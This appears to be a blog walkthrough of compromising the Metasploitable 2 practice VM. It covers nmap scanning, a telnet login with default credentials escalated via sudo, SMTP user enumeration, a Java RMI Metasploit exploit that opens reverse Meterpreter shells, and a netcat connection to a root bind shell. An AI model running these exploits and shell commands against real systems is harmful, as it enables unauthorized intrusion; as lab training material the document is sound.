Metasploitable 2 is a nice challenge for testing all of its vulnerabilities with the Metasploit tool. Really simple and nice tricks to get root on a vulnerable version of the system.
Let's get started.
┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:33 +0630
Nmap scan report for 192.168.1.1
Host is up (0.0014s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.72
Host is up (0.0017s latency).
MAC Address: CC:AF:78:50:24:00 (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.73
Host is up (0.00027s latency).
MAC Address: 00:0C:29:C7:95:E6 (VMware)
Nmap scan report for 192.168.1.100
Host is up (0.00013s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.49 seconds
I start with an Nmap ping sweep to find the target IP of the VM. The VMware guest is running on 192.168.1.73. Nmap again to find the open ports:
┌─[[email protected]]─[~]
└──> nmap -sV -p- 192.168.1.73

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-09 17:36 +0630
Nmap scan report for kioptrix3.com (192.168.1.73)
Host is up (0.0016s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
53/tcp    open  domain      ISC BIND 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp   open  rpcbind     2 (RPC #100000)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp  open  vnc         VNC (protocol 3.3)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
51268/tcp open  rmiregistry GNU Classpath grmiregistry
51834/tcp open  mountd      1-3 (RPC #100005)
53124/tcp open  status      1 (RPC #100024)
60448/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:C7:95:E6 (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.90 seconds
Awesome, there are many services running, so there may be many vulnerabilities. Let's exploit from top to bottom.
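Before going through the list by hand, it helps to turn the service table above into structured records and flag the rows that deserve attention first. The parser and watch list below are an added example, not part of the original post; the watch-list entries are constructed from the versions and protocols this walkthrough goes on to use (vsftpd 2.3.4, OpenSSH 4.7p1, telnet, the r-services, the RMI registry and the port 1524 shell), and the sample rows are copied from the scan.

```python
import re
from dataclasses import dataclass

# Constructed sample: a handful of rows copied from the nmap -sV output above.
SAMPLE_SCAN = """\
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
1099/tcp  open  rmiregistry GNU Classpath grmiregistry
1524/tcp  open  shell       Metasploitable root shell
"""

# One nmap port row: "<port>/<proto>  <state>  <service>  [<version ...>]".
ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str  # empty when nmap printed no VERSION column

def parse_nmap_table(text):
    """Return one Service per port row; header and summary lines are skipped."""
    services = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            port, proto, state, name, ver = m.groups()
            services.append(Service(int(port), proto, state, name, (ver or "").strip()))
    return services

# Watch list (constructed for this example): version strings the post links to as
# exploitable, and services that are a risk whatever their version.
VULNERABLE_VERSIONS = {"vsftpd 2.3.4": "backdoored release", "OpenSSH 4.7p1": "end-of-life"}
RISKY_SERVICES = {"telnet": "clear-text login", "exec": "rsh family, clear-text",
                  "login": "rsh family, clear-text", "shell": "rsh shell or bind shell",
                  "rmiregistry": "RMI registry reachable (remote class loading)"}

def triage(services):
    """Map each flagged port to the reason it needs attention; others are omitted."""
    findings = {}
    for s in services:
        for prefix, why in VULNERABLE_VERSIONS.items():
            if s.version.startswith(prefix):
                findings[s.port] = why
        # nmap marks an unconfirmed guess with a trailing "?" (e.g. "login?").
        name = s.name.rstrip("?")
        if name in RISKY_SERVICES and s.port not in findings:
            findings[s.port] = RISKY_SERVICES[name]
    return findings
```

Feed it the full scan (for example `parse_nmap_table(open("scan.txt").read())`) and every row in the list above comes back flagged, which is the same top-to-bottom order the rest of this post follows.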
First, the vsftpd version is 2.3.4. I googled the version number to find out whether it is exploitable or not.
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
Yes. It can be exploited with Metasploit. Let's try.
OpenSSH 4.7p1 is also vulnerable:
https://charlesreid1.com/wiki/Metasploitable/SSH/Exploits
Telnet is also vulnerable: the login banner itself gives away the credentials.
┌─[[email protected]]─[~]
└──> telnet 192.168.1.73
Trying 192.168.1.73...
Connected to 192.168.1.73.
Escape character is '^]'.
(metasploitable2 ASCII-art banner)

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Tue Jan 9 05:44:13 EST 2018 from 192.168.1.101 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin:
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#
Next, SMTP user enumeration (the gld_postfix exploit is tried first and fails, because nothing listens on port 2525; the smtp_enum scanner then works):
msf > use exploit/linux/misc/gld_postfix
msf exploit(linux/misc/gld_postfix) > show options

Module options (exploit/linux/misc/gld_postfix):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  2525             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   RedHat Linux 7.0 (Guinness)

msf exploit(linux/misc/gld_postfix) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(linux/misc/gld_postfix) > run

[*] Started reverse TCP handler on 192.168.1.101:4444
[-] 192.168.1.73:2525 - Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.1.73:2525).
[*] Exploit completed, but no session was created.
msf exploit(linux/misc/gld_postfix) > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(scanner/smtp/smtp_enum) > set RHOSTS 192.168.1.73
RHOSTS => 192.168.1.73
msf auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.1.73:25 - 192.168.1.73:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.1.73:25 - 192.168.1.73:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Next, Samba smbd 3.X. It can be exploited, but I don't show it in this walkthrough because I already wrote it up in the last one.
Next, GNU Classpath (the Java RMI registry on port 1099) 😉
msf auxiliary(scanner/smtp/smtp_enum) > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > show options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOST                       yes       The target address
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

msf exploit(multi/misc/java_rmi_server) > set RHOST 192.168.1.73
RHOST => 192.168.1.73
msf exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.101:4444
[*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/wKNQ8aS6geYU
[*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/wKNQ8aS6geYU
[*] 192.168.1.73:1099 - Server started.
[*] 192.168.1.73:1099 - Sending RMI Header...
[*] 192.168.1.73:1099 - Sending RMI Call...
[*] 192.168.1.73:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 192.168.1.73
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.73:36318) at 2018-01-09 18:53:38 +0630
id
[-] 192.168.1.73:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 192.168.1.73:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > id
[*] exec: id

uid=0(root) gid=0(root) groups=0(root)
msf exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.1.101:4444
[*] 192.168.1.73:1099 - Using URL: http://0.0.0.0:8080/iSyb4JDXRzhA5h
[*] 192.168.1.73:1099 - Local IP: http://192.168.1.101:8080/iSyb4JDXRzhA5h
[*] 192.168.1.73:1099 - Server started.
[*] 192.168.1.73:1099 - Sending RMI Header...
[*] 192.168.1.73:1099 - Sending RMI Call...
[*] 192.168.1.73:1099 - Replied to request for payload JAR
[*] Sending stage (53837 bytes) to 192.168.1.73
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.73:33132) at 2018-01-09 18:53:58 +0630
^C[-] 192.168.1.73:1099 - Exploit failed: Interrupt
[*] 192.168.1.73:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Got root! Next, the shell connection on port 1524:
┌─[[email protected]]─[~]
└──> nc 192.168.1.73 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root@metasploitable:/#
Woot! Thanks for reading. Happy hacking.
PS – There are many exploit methods. Good luck.